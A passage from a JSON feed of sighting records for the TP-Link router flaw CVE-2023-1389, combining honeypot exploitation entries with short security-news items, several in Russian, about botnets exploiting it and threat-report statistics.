\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u041f\u041e \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0434\u0435\u0441\u044f\u0442\u044c \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u0432 \u0441 BEC, \u043f\u0440\u0438 \u044d\u0442\u043e\u043c 70% \u0442\u0430\u043a\u0438\u0445 \u0430\u0442\u0430\u043a \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438.\n\n\u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0435 2024 \u0433\u043e\u0434\u0430 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0430\u0442\u0430\u043a \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 IoT \u0432\u044b\u0440\u043e\u0441\u043b\u043e \u043d\u0430 107%. \u0412 \u0441\u0440\u0435\u0434\u043d\u0435\u043c \u043e\u043d\u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043b\u0438\u0441\u044c \u043f\u043e\u0434 \u0430\u0442\u0430\u043a\u043e\u0439 52,8 \u0447\u0430\u0441\u0430. \u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u0430 \u0442\u0430\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u2014 \u043d\u0438\u0437\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 IoT-\u0434\u0435\u0432\u0430\u0439\u0441\u043e\u0432, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0438\u0445 \u043b\u0451\u0433\u043a\u0438\u043c\u0438 \u043c\u0438\u0448\u0435\u043d\u044f\u043c\u0438 \u0434\u043b\u044f \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u043e\u0432.\n\n83% \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u0439, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c\u044b\u0445 \u043e\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 SonicWall, \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c\u0438 \u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u0443\u0447\u0451\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438. \u042d\u0442\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0439\u0441\u044f \u0440\u043e\u0441\u0442 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 \u043a\u0430\u043a \u043c\u0438\u0448\u0435\u043d\u0435\u0439 \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u0432 2024 \u0433\u043e\u0434\u0443 \u0438 \u0434\u0430\u043b\u0435\u0435.\n\n\u0410\u0442\u0430\u043a\u0438 \u043d\u0430 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a \u0441\u0442\u0430\u043d\u043e\u0432\u044f\u0442\u0441\u044f \u0432\u0441\u0451 \u0431\u043e\u043b\u0435\u0435 \u0447\u0430\u0441\u0442\u044b\u043c\u0438 \u0438 \u0441\u043b\u043e\u0436\u043d\u044b\u043c\u0438. \u0412 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u0431\u044b\u043b\u0438 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u044b \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u044b\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 JetBrains TeamCity, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438. \u0422\u0430\u043a, 16% \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 SonicWall \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043b\u0438\u0441\u044c \u0430\u0442\u0430\u043a\u0430\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u043c \u044d\u0442\u0443 \u0431\u0440\u0435\u0448\u044c, \u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u0430 \u0432 \u043c\u0430\u0440\u0442\u0435.\n\nPowerShell, \u043c\u043e\u0449\u043d\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0430\u0446\u0438\u0438 \u0438 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u0441 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u043c\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438 Windows, \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c\u0438. \u0411\u043e\u043b\u0435\u0435 90% \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a AgentTesla \u0438 LokiBot, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 PowerShell \u0434\u043b\u044f \u0441\u0432\u043e\u0438\u0445 \u0446\u0435\u043b\u0435\u0439. \u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0443\u0441\u0438\u043b\u0438\u044f \u043f\u043e \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e \u0442\u0430\u043a\u0438\u0445 \u0430\u0442\u0430\u043a, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442 \u043d\u043e\u0432\u044b\u0435 \u0441\u043f\u043e\u0441\u043e\u0431\u044b \u043e\u0431\u0445\u043e\u0434\u0430 \u0437\u0430\u0449\u0438\u0442\u043d\u044b\u0445 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432.\n\n\u0412\u0430\u0436\u043d\u044b\u043c \u0444\u0430\u043a\u0442\u043e\u0440\u043e\u043c \u0440\u043e\u0441\u0442\u0430 \u0447\u0438\u0441\u043b\u0430 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0430\u0442\u0430\u043a \u0441\u0442\u0430\u043b\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2023-1389, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 TP-Link, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 21% \u043c\u0430\u043b\u044b\u0445 \u0438 \u0441\u0440\u0435\u0434\u043d\u0438\u0445 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u044f\u0442\u0438\u0439. \u041e\u0442\u0447\u0451\u0442 SonicWall \u043f\u043e\u0434\u0447\u0451\u0440\u043a\u0438\u0432\u0430\u0435\u0442 \u0432\u0430\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0441\u0438\u043b\u0435\u043d\u0438\u044f \u043c\u0435\u0440 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u0440\u0430\u0441\u0442\u0443\u0449\u0438\u0445 \u0443\u0433\u0440\u043e\u0437. \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0443\u0434\u0435\u043b\u044f\u0442\u044c \u043e\u0441\u043e\u0431\u043e\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 IoT-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0438 \u0443\u043b\u0443\u0447\u0448\u0435\u043d\u0438\u044e \u0437\u0430\u0449\u0438\u0442\u044b \u0446\u0435\u043f\u043e\u0447\u0435\u043a \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2024-07-29T13:56:19.000000Z"}, {"uuid": "93142775-f193-4cf7-a31b-4d56bc2ef62f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-18)", "content": "", "creation_timestamp": "2026-01-18T00:00:00.000000Z"}, {"uuid": "bf63afde-9225-4e63-89d9-a7b871bec047", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-31)", "content": "", "creation_timestamp": "2026-03-31T00:00:00.000000Z"}, {"uuid": "bca3e0c9-786c-494c-8bc9-67b251bcec34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "https://t.me/cKure/12912", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Mirai Variant CVE-2023-1389.\n\nhttps://blog.permafrostsec.com/posts/mirai-variant-cve-2023-1389/", "creation_timestamp": "2024-05-15T07:27:30.000000Z"}, {"uuid": "0c63c18e-950f-49f8-a64d-dff6ad4371d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-23)", "content": "", "creation_timestamp": "2026-04-23T00:00:00.000000Z"}, {"uuid": "9a458540-ce2e-4d75-b112-cd3b9af2bd81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-28)", "content": "", "creation_timestamp": "2026-04-28T00:00:00.000000Z"}, {"uuid": "ac2febc0-a456-451e-a823-6510a65625d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-25)", "content": "", "creation_timestamp": "2026-04-25T00:00:00.000000Z"}, {"uuid": "e79f8104-7783-48d3-95a7-a26c467322eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-26)", "content": "", "creation_timestamp": "2026-04-26T00:00:00.000000Z"}, {"uuid": "cdb93d86-6cfd-447c-b489-c8d17516bdbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-28)", "content": "", "creation_timestamp": "2026-04-28T00:00:00.000000Z"}, {"uuid": "eb8181cc-def5-4031-9d69-0e6b7cf73522", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://t.me/ctinow/151120", "content": "https://ift.tt/o5NCFem\nCVE-2023-1389: A New Means to Expand Botnets, (Wed, Nov 22nd)", "creation_timestamp": "2023-11-22T19:37:14.000000Z"}, {"uuid": "b21970ff-8a1f-4b8d-b8b9-363a56efbf86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/BleepingComputer/16369", "content": "\u200aTP-Link Archer WiFi router flaw exploited by Mirai malware\n\nThe Mirai malware botnet is actively exploiting a TP-Link Archer A21 (AX1800) WiFi router vulnerability tracked as CVE-2023-1389 to incorporate devices into DDoS (distributed denial of service) swarms. [...]\n\nhttps://www.bleepingcomputer.com/news/security/tp-link-archer-wifi-router-flaw-exploited-by-mirai-malware/", "creation_timestamp": "2023-04-25T11:56:19.000000Z"}, {"uuid": "1a0eacfa-1404-46c3-8631-bc5ad58110ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/alexredsec/357", "content": "\u0423\u0436\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0442\u044c \"\u043f\u043e\u0447\u0442\u0438 \u043f\u043e\u043b\u0443\u0433\u043e\u0434\u043e\u0432\u044b\u0435\" \u0438\u0442\u043e\u0433\u0438 \u0437\u0430 2023 \u0433\u043e\u0434 - \u0432\u0440\u0435\u043c\u044f \u043b\u0435\u0442\u0438\u0442\ud83d\ude05\n\u0412\u043e\u0442 \u0440\u0435\u0431\u044f\u0442\u0430 \u0438\u0437 PRIOn \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0443 \u043f\u043e \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c, \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0432 \u044d\u0442\u043e \u0433\u043e\u0434\u0443 - \u0438\u0445 \u043d\u0430\u0441\u0447\u0438\u0442\u0430\u043b\u0438 44 \u0448\u0442\u0443\u043a\u0438.\n\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \"\u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0435\" \u043f\u043e \u0432\u0435\u0440\u0441\u0438\u0438 PRIOn:\n\u27a1\ufe0fCVE-2023-23397 [Microsoft Outlook] - \u0441\u0430\u043c\u0430\u044f \ud83d\udd25 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442. \u0410\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439 APT28.\n\u27a1\ufe0fCVE-2023-27350  [PaperCut NG] - \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c\u0438 ransomware-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438.\n\u27a1\ufe0fCVE-2023-28771 [Zyxel] \u0438 CVE-2023-1389 [TP-Link] - \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u043c\u043e\u0433\u0430\u043b\u0438 \u043f\u043e\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0440\u044f\u0434\u044b \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Mirai\ud83d\ude08\n\u27a1\ufe0fCVE-2023-0669 [Fortra GoAnywhere MFT] - \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439 Clop.\n\u27a1\ufe0fCVE-2023-2868 [Barracuda ESG] - \u043f\u043e\u043a\u0430 \u043d\u0438\u043a\u043e\u043c\u0443 \u043d\u0435 \u043f\u0440\u0438\u043f\u0438\u0441\u0430\u043d\u043d\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u043b\u044f \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445.\n\u27a1\ufe0fCVE-2023-24880 [Microsoft Windows SmartScreen] - \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f ransomware-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439 Magniber.\n\u27a1\ufe0fCVE-2023-28252 [Microsoft Windows 10] - \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f ransomware-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439 Nokoyama.\n\u27a1\ufe0fCVE-2023-27532 [Veeam Backup] - \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0442\u0435\u0447\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 APT-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0435 FIN7.\n\u27a1\ufe0fCVE-2023-34362 [MOVEit Transfer] - \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c\u0438 APT-\u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438.\n\n\u041d\u0443 \u0438 \u0422\u041e\u041f-3 \u0442\u0438\u043f\u043e\u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:\n\u27a1\ufe0fPrivilege Escalation\n\u27a1\ufe0fSecurity Feature Bypass\n\u27a1\ufe0fCommand Injection", "creation_timestamp": "2023-06-07T15:59:32.000000Z"}, {"uuid": "eef517e5-5ef2-40a9-93ec-562bdb0bfae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/ton618cyber/7746", "content": "Ballista Botnet Exploits Unpatched TP-Link Vulnerability, Infects Over 6,000 Devices\n\nBallista botnet exploits TP-Link router flaw CVE-2023-1389, infecting 6,000+ devices worldwide and evolving to use TOR.\n\nThe Hacker News | thehackernews.com \u2022 Mar 11, 2025", "creation_timestamp": "2025-03-11T16:46:50.000000Z"}, {"uuid": "5603ec18-b00b-464a-9101-82ad79267c61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://t.me/itsec_news/5762", "content": "\u200b\u26a1\ufe0f\u0421\u0442\u0430\u0440\u044b\u0439 CVE, \u043d\u043e\u0432\u044b\u0439 \u0437\u0430\u0445\u043e\u0434. 69 000 \u0430\u0442\u0430\u043a \u2014 \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435\n\n\ud83d\udcac \u041c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0430 \u043e\u0437\u043d\u0430\u043c\u0435\u043d\u043e\u0432\u0430\u043b\u0441\u044f \u043d\u043e\u0432\u043e\u0439 \u0432\u0441\u043f\u044b\u0448\u043a\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u043e\u0432, \u0441\u043e\u0441\u0440\u0435\u0434\u043e\u0442\u043e\u0447\u0435\u043d\u043d\u043e\u0439 \u0441\u0440\u0430\u0437\u0443 \u0432 \u0434\u0432\u0443\u0445 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u0445 \u2014 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u043d\u043e\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 AWS \u0447\u0435\u0440\u0435\u0437 \u0442\u0435\u0445\u043d\u0438\u043a\u0443 SSRF (Server-Side Request Forgery). \u0410\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u043a\u0430\u0437\u0430\u043b, \u043a\u0430\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u043f\u0440\u0438\u0446\u0435\u043b\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0438 \u043a\u0430\u043a\u0438\u0435 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0438 \u0437\u0430\u0449\u0438\u0442\u044b \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b.\n\n\u0410\u0431\u0441\u043e\u043b\u044e\u0442\u043d\u044b\u043c \u043b\u0438\u0434\u0435\u0440\u043e\u043c \u043f\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0441\u043d\u043e\u0432\u0430 \u0441\u0442\u0430\u043b\u0430 CVE-2017-9841 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 9.8) \u2014 \u0441\u0442\u0430\u0440\u0430\u044f, \u043d\u043e \u0432\u043e\u0441\u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHPUnit, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0439 \u043a\u043e\u0434. \u0421\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430 \u043c\u0430\u0440\u0442 \u0431\u044b\u043b\u043e \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043e \u043f\u043e\u0447\u0442\u0438 70 \u0442\u044b\u0441\u044f\u0447 \u0440\u0430\u0437. \u041f\u0440\u0438\u0447\u0451\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u043a \u043e\u0448\u0438\u0431\u043a\u0435 \u0440\u0435\u0437\u043a\u043e \u0432\u043e\u0437\u0440\u043e\u0441 \u0435\u0449\u0451 \u0432 \u043c\u0430\u0435 2024 \u0433\u043e\u0434\u0430 \u0438 \u0441 \u0442\u0435\u0445 \u043f\u043e\u0440 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432\u043e\u043b\u043d\u0430\u043c\u0438. \u0422\u0430\u043a\u0430\u044f \u0434\u0438\u043d\u0430\u043c\u0438\u043a\u0430 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u0443\u044e \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043d\u043d\u043e\u0441\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0441\u0451 \u0435\u0449\u0451 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f PHPUnit.\n\n\u0412\u0442\u043e\u0440\u043e\u0435 \u043c\u0435\u0441\u0442\u043e \u0441\u043e\u0445\u0440\u0430\u043d\u0438\u043b\u0430 CVE-2023-1389 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 8.8), \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u043c\u0438 TP-Link Archer AX21. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c 